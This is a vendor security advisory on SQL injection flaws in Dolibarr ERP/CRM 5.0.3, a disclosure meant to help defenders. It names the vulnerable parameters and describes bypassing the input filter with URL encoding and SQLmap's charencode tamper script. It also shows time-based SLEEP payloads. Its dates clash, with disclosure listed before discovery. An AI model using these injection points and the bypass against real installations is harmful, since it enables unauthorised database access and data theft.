|Affected Version(s)||5.0.3 probably prior|
|Vulnerability Discovery||June 3, 2017|
|Vendor Notification||June 6, 2017|
|Advisory Publication||June 7, 2017 [without technical details]|
|Vendor Acknowledgment||June 18, 2017|
|Vendor Fix||Partially fixed as of 5.0.4|
|Public Disclosure||March 12, 2017|
|Latest Modification||March 12, 2017|
|Product Description||Dolibarr ERP/CRM is an open source, free software package for small and medium companies, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.|
|Credits||Yann Chalençon, Security Researcher & Penetration Tester @wizlynx group|
|Multiple SQL Injection Vulnerabilities in Dolibarr|
|Severity: Medium||CVSS Score: 6.3||CWE-ID: CWE-89||Status: Partial Fix|
|The application Dolibarr is affected by multiple SQL injection vulnerabilities affecting version 5.0.3 and prior. These vulnerabilities could allow remote authenticated attackers to inject arbitrary SQL code.|
|CVSS Base Score|
|Attack Complexity||Low||Confidentiality Impact||Low|
|Privileges Required||Low||Integrity Impact||Low|
|User Interaction||None||Availability Impact||Low|
The Dolibarr web application version 5.0.3 is vulnerable to SQL injection in multiple places. Exploiting this vulnerability leads to an authenticated user being able to inject arbitrary SQL statements, e.g. to dump the entire database.
In addition, the filter in use by Dolibarr to prevent SQL injections can be easily bypassed by URL encoding SQL payloads. This can as well be automated with SQLmap and tamper script “charencode”.
The following screenshot shows the request when listing commercial proposals. To demonstrate the SQL injection vulnerability, we have inputted a single quote character in the viewstatut parameter. This resulted in a SQL error as displayed on the right side of the screenshot:
To demonstrate further the SQL injection, we have inserted “SLEEP” commands which if successfully ran by the database should delay response from the web server. The first screenshot shows the baseline request without the SLEEP command. As you can see on the bottom right corner, the response is returned in 56 milliseconds
We have then added “-SLEEP(1)” and response was returned in 4057 milliseconds
We have then added “-SLEEP(2)” and response was returned in 8059 milliseconds
Note: Most vulnerabilities have been fixed in Dolibarr version 5.0.4. However, the viewstatut parameter isstill vulnerable as of 7.0.0. As for parameter propal_statut, it has been renamed to search_statut in version 7.0.0 and is still vulnerable.